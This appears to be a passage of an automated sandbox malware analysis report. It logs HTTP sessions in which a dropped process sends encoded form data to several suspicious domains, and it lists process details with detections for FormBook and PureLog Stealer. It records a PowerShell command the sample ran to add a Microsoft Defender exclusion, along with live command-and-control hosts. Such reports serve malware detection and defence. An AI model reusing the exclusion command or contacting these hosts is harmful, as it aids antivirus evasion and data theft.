                                                                                                        Data Ascii: aNXP_jw=J+GqkxZGxkCVsnVm63dJU9CAryFudCcGrWe69heVicdu/mm7UFqcG/+Up8+UE8L+yfsRy5ekljlpIe0vcwsish+kjXal1oFFBmEKBcjNGfGQFPMDSEV3O+LBKjZg1GtHk+bpd+0awzVY9js6sFkuW8EYm54YGvl1SaqUyVRAn6IdDMgosOWewLw6nUjUc40t+AiAe//Wt36H
                                                                                                        Dec 2, 2024 14:40:10.781769037 CET | 479 | IN | HTTP/1.1 404 Not Found
                                                                                                        Date: Mon, 02 Dec 2024 13:40:10 GMT
                                                                                                        Server: Apache
                                                                                                        Content-Length: 315
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        34 | 192.168.2.6 | 50026 | 67.223.117.169 | 80 | 2488 | C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        Dec 2, 2024 14:40:12.262773037 CET | 843 | OUT | POST /mbcs/ HTTP/1.1
                                                                                                        Host: www.rtpsilva4d.click
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.rtpsilva4d.click
                                                                                                        Referer: http://www.rtpsilva4d.click/mbcs/
                                                                                                        Content-Length: 236
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Data Ascii: aNXP_jw=J+GqkxZGxkCVuHlmqk1JVdCD3iFuXidPrWS69k7Iip1u+G27VEqcF/+Uhc+RA8L1yfQjy4ikljhpIawvchshtx+c6HanxoFFBmEKBc3nGfeQZu8DUhh2AeLOCDZgj2tLk+bPd/owwxtY9n86tR4tDsEkoZ5fFuQ5Ta/AtFZN74J6G69yw9W9ibQ4nW7mcY0H8AaAMozxiDfk7B1nVVzIrXOta6HhSrMyeA==
                                                                                                        Dec 2, 2024 14:40:13.518690109 CET | 479 | IN | HTTP/1.1 404 Not Found
                                                                                                        Date: Mon, 02 Dec 2024 13:40:13 GMT
                                                                                                        Server: Apache
                                                                                                        Content-Length: 315
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        35 | 192.168.2.6 | 50027 | 67.223.117.169 | 80 | 2488 | C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        Dec 2, 2024 14:40:14.933132887 CET | 1856 | OUT | POST /mbcs/ HTTP/1.1
                                                                                                        Host: www.rtpsilva4d.click
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.rtpsilva4d.click
                                                                                                        Referer: http://www.rtpsilva4d.click/mbcs/
                                                                                                        Content-Length: 1248
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Data Ascii: aNXP_jw= [TRUNCATED]
                                                                                                        Dec 2, 2024 14:40:16.194259882 CET | 479 | IN | HTTP/1.1 404 Not Found
                                                                                                        Date: Mon, 02 Dec 2024 13:40:15 GMT
                                                                                                        Server: Apache
                                                                                                        Content-Length: 315
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        36 | 192.168.2.6 | 50028 | 67.223.117.169 | 80 | 2488 | C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        Dec 2, 2024 14:40:17.599652052 CET | 553 | OUT | GET /mbcs/?cTT8u=Q4NHoHJ0&aNXP_jw=E8uKnHhByG2Tv3dXt0hUXbTg8EJLb11h3Xjfw3eru7l4vir7amLvL6eqi8CHILvLkZwm8qiwgwp5C/0JAU8dpm6junvogZRuLkUhLJLqNe6fCvA+b04RO+uOFUQ6tBhUgoCpKJY= HTTP/1.1
                                                                                                        Host: www.rtpsilva4d.click
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Dec 2, 2024 14:40:18.811355114 CET | 479 | IN | HTTP/1.1 404 Not Found
                                                                                                        Date: Mon, 02 Dec 2024 13:40:18 GMT
                                                                                                        Server: Apache
                                                                                                        Content-Length: 315
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        37 | 192.168.2.6 | 50029 | 85.159.66.93 | 80 | 2488 | C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        Dec 2, 2024 14:40:24.729211092 CET | 822 | OUT | POST /jm9b/ HTTP/1.1
                                                                                                        Host: www.restobarbebek.xyz
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.restobarbebek.xyz
                                                                                                        Referer: http://www.restobarbebek.xyz/jm9b/
                                                                                                        Content-Length: 212
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Data Ascii: aNXP_jw=aq5smm9Kz2tW5AcCBXC8GEWZ3fOp3upLJ+L8aOqwcDonTpYvE+ZLyu2ZD6RBjxXasPaxOFRd3OXP6uqTzj0WhCm72/lauhZSQUvNSw2PnFxpybDBblX2p6YEQybEZb7io93oaPTgZJak2y3N8bMhWViX756pKxy+Guru8JfigGf8SSl1Hx1/g+BQtekS0dDHeRscB0UArQFC


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        38 | 192.168.2.6 | 50030 | 85.159.66.93 | 80 | 2488 | C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        Dec 2, 2024 14:40:27.402673006 CET | 846 | OUT | POST /jm9b/ HTTP/1.1
                                                                                                        Host: www.restobarbebek.xyz
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.restobarbebek.xyz
                                                                                                        Referer: http://www.restobarbebek.xyz/jm9b/
                                                                                                        Content-Length: 236
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Data Ascii: aNXP_jw=aq5smm9Kz2tWoQMCH068AkWe4/Op+OpHJ+H8aLKedwcnSM8vF6NL8O2ZMqRAuRXEsPWDOE9d3ODP6siTzUIXuym53PlYxxZSQUvNS2axnF5pyqzBdwjx1qYHdibEdb7mo92NaOOLZKyk2yHN8KMiYViZjZ7ENAS2fO/u6oHh0xf+Xk4vbC1cyuhStc8g09DtcRUcTjYnkkghCCX8vSD5oMjn1YdI+dy2Bw==


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        39 | 192.168.2.6 | 50031 | 85.159.66.93 | 80 | 2488 | C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        Dec 2, 2024 14:40:30.076677084 CET | 1859 | OUT | POST /jm9b/ HTTP/1.1
                                                                                                        Host: www.restobarbebek.xyz
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.restobarbebek.xyz
                                                                                                        Referer: http://www.restobarbebek.xyz/jm9b/
                                                                                                        Content-Length: 1248
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Data Ascii: aNXP_jw= [TRUNCATED]


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        40 | 192.168.2.6 | 50032 | 85.159.66.93 | 80 | 2488 | C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        Dec 2, 2024 14:40:32.738020897 CET | 554 | OUT | GET /jm9b/?aNXP_jw=XoRMlRQavUBSvHE6AV2eFSHD1vC94NgmQfaFO5StTzEKBs4nBsZa6I2TGaV3pACayJ+XHXZH2+vi6MzB3UVzgDaP4LABx1lqbBfrXRaislputLbkLl7Cj+NmRWLfbOqf/tiSO58=&cTT8u=Q4NHoHJ0 HTTP/1.1
                                                                                                        Host: www.restobarbebek.xyz
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Dec 2, 2024 14:40:34.108509064 CET | 225 | IN | HTTP/1.1 404 Not Found
                                                                                                        Server: nginx/1.14.1
                                                                                                        Date: Mon, 02 Dec 2024 13:40:33 GMT
                                                                                                        Content-Length: 0
                                                                                                        Connection: close
                                                                                                        X-Rate-Limit-Limit: 5s
                                                                                                        X-Rate-Limit-Remaining: 19
                                                                                                        X-Rate-Limit-Reset: 2024-12-02T13:40:38.8801182Z


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        41 | 192.168.2.6 | 50033 | 162.159.140.104 | 80 | 2488 | C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        Dec 2, 2024 14:40:39.986907959 CET | 810 | OUT | POST /w21a/ HTTP/1.1
                                                                                                        Host: www.nagasl89.baby
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.nagasl89.baby
                                                                                                        Referer: http://www.nagasl89.baby/w21a/
                                                                                                        Content-Length: 212
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Data Ascii: aNXP_jw=Gb5eaqV9zMxhJlh+GCxwHGMLa5Hr5vCHLr6lZe1gsa4R6Jayfe0mFbMrdrbHjsyiiIhjFz/JIcexw6YxtHdu8Kt3zivHRo9zyM3GtL5CABsjrgpsKo1NXw/JgRR/WcZWDp6RbLKRiLrzwGE/2U2dKO/t4UObLwbl+m6iLzOlcPyvfvCBR4g0zc3H8oWQ6BvTb+yYJqkrD45H
                                                                                                        Dec 2, 2024 14:40:41.528103113 CET | 844 | IN | HTTP/1.1 200 OK
                                                                                                        Date: Mon, 02 Dec 2024 13:40:41 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eBQdz5LeQr4xk3hUsotuMitXm9tKfle7p0T2%2BGw4D4qeQx%2BrxhRQs2oFboregOktoIBxiiQYGJ5dKeNvnYIZA8oN1%2F5OSHZbf3zLIf6N0EvHXGbCQJnpUK76%2FIRh%2FlrlkI%2Bpow%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8ebbbaeb59c98c8d-EWR
                                                                                                        Content-Encoding: gzip
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2056&min_rtt=2056&rtt_var=1028&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=810&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 140


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        42 | 192.168.2.6 | 50034 | 162.159.140.104 | 80 | 2488 | C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        Dec 2, 2024 14:40:43.165122032 CET | 834 | OUT | POST /w21a/ HTTP/1.1
                                                                                                        Host: www.nagasl89.baby
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.nagasl89.baby
                                                                                                        Referer: http://www.nagasl89.baby/w21a/
                                                                                                        Content-Length: 236
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Data Ascii: aNXP_jw=Gb5eaqV9zMxhP1R+AlFwPGMIGpHrg/CDLrmlZfgttpcR6ryycccmGbMrFbbC7MypiItrFyTJIc6xw+cxt2dt9atx8CvBMY9zyM3GtLd4AB0jrwZsKJ1OIA/K3hR/AsZKDp6/bPSriJjzwD4/2BCCAO/rnEP2F1G3ynqhJhW1A/iceZfbNLgXhMXF8qOi6hv5Z+KYb9oMMMckx9cUW6AYXMsB83x12tHm7A==
Timestamp: Dec 2, 2024 14:40:44.708770990 CET, Bytes transferred: 841, Direction: IN, Data:
HTTP/1.1 200 OK
                                                                                                        Date: Mon, 02 Dec 2024 13:40:44 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dvBNwCKWKzfEEyLKBHjnRXdN%2Bg0eZ9I%2FByqogHL7ecgXzwREtlxo459c9H7pxcdgVawMSCCKp3yNjGy31PX57lgetkco1u6SKOmIJ6T95vwkjN5%2Fu%2Fw8K%2F5Ox29hWjP1nsAK7Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8ebbbaff3eb20f53-EWR
                                                                                                        Content-Encoding: gzip
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1464&min_rtt=1464&rtt_var=732&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=834&delivery_rate=0&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 140


Session ID: 43, Source IP: 192.168.2.6, Source Port: 50035, Destination IP: 162.159.140.104, Destination Port: 80
Timestamp: Dec 2, 2024 14:40:46.994199038 CET, Bytes transferred: 1847, Direction: OUT, Data:
POST /w21a/ HTTP/1.1
                                                                                                        Host: www.nagasl89.baby
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.nagasl89.baby
                                                                                                        Referer: http://www.nagasl89.baby/w21a/
                                                                                                        Content-Length: 1248
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
Data Ascii: aNXP_jw= [TRUNCATED]
Timestamp: Dec 2, 2024 14:40:48.609563112 CET, Bytes transferred: 840, Direction: IN, Data:
HTTP/1.1 200 OK
                                                                                                        Date: Mon, 02 Dec 2024 13:40:48 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fj2oMbbOY67wlckcy5EAafOiwb2gOlr3ONCh32BGb6rJS%2FQ%2Bv8zQqJ0ox2i%2FV4Y5HGwb6oX0M4bWn5A22afTCO98blEgOM5INu3JaE2p6hNCiWfOnlOfhBUqF5Bb8ZN7%2FkW6Zg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8ebbbb17b82743fe-EWR
                                                                                                        Content-Encoding: gzip
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1566&min_rtt=1566&rtt_var=783&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1847&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 140


Session ID: 44, Source IP: 192.168.2.6, Source Port: 50036, Destination IP: 162.159.140.104, Destination Port: 80
Timestamp: Dec 2, 2024 14:40:49.661510944 CET, Bytes transferred: 550, Direction: OUT, Data:
GET /w21a/?cTT8u=Q4NHoHJ0&aNXP_jw=LZR+ZfxbvtNDeEpFHDBOAnNQReD6jdenS5faavQJiaR4jsC5ZvEsJscNWNTIhM6XzOFPLAXSOfmv47Q4tyBC+fdx4nmbPqtD38XQudBSIRIiqzdGLKpTAxO37HRkObotKIbjEro= HTTP/1.1
                                                                                                        Host: www.nagasl89.baby
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
Timestamp: Dec 2, 2024 14:40:51.357806921 CET, Bytes transferred: 1236, Direction: IN, Data:
HTTP/1.1 404 Not Found
                                                                                                        Date: Mon, 02 Dec 2024 13:40:51 GMT
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        vary: Accept-Encoding
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4Bj%2FhUPlA8uq5yAyuZjDrV2m8Maf1noh2zh%2FEkSNIIo86l%2FuVuM4B%2BwREoHQOzzvaevROgvaeLhdansIE0nH0VlE%2B5eFe%2B7wu9ZiCoLNJc%2FiEa%2B0Aw6bneun38fR7H%2Fwei1Usw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8ebbbb28bb180f53-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1474&min_rtt=1474&rtt_var=737&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=550&delivery_rate=0&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"



                                                                                                        Target ID:0
                                                                                                        Start time:08:36:38
                                                                                                        Start date:02/12/2024
                                                                                                        Path:C:\Users\user\Desktop\specification and drawing.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\Desktop\specification and drawing.exe"
                                                                                                        Imagebase:0x930000
                                                                                                        File size:917'504 bytes
                                                                                                        MD5 hash:8941CBF2CDD44ECFE97F45A2FED0D94F
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2187012973.00000000056C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2179156189.0000000003DC9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2178181816.0000000002E0F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        Reputation:low
                                                                                                        Has exited:true

                                                                                                        Target ID:3
                                                                                                        Start time:08:36:42
                                                                                                        Start date:02/12/2024
                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\specification and drawing.exe"
                                                                                                        Imagebase:0x2a0000
                                                                                                        File size:433'152 bytes
                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:4
                                                                                                        Start time:08:36:42
                                                                                                        Start date:02/12/2024
                                                                                                        Path:C:\Users\user\Desktop\specification and drawing.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\Desktop\specification and drawing.exe"
                                                                                                        Imagebase:0x550000
                                                                                                        File size:917'504 bytes
                                                                                                        MD5 hash:8941CBF2CDD44ECFE97F45A2FED0D94F
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2400421345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2401176438.0000000001030000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2402440519.0000000001E90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        Reputation:low
                                                                                                        Has exited:true

                                                                                                        Target ID:5
                                                                                                        Start time:08:36:42
                                                                                                        Start date:02/12/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff66e660000
                                                                                                        File size:862'208 bytes
                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:7
                                                                                                        Start time:08:36:57
                                                                                                        Start date:02/12/2024
                                                                                                        Path:C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        Wow64 process (32bit):true
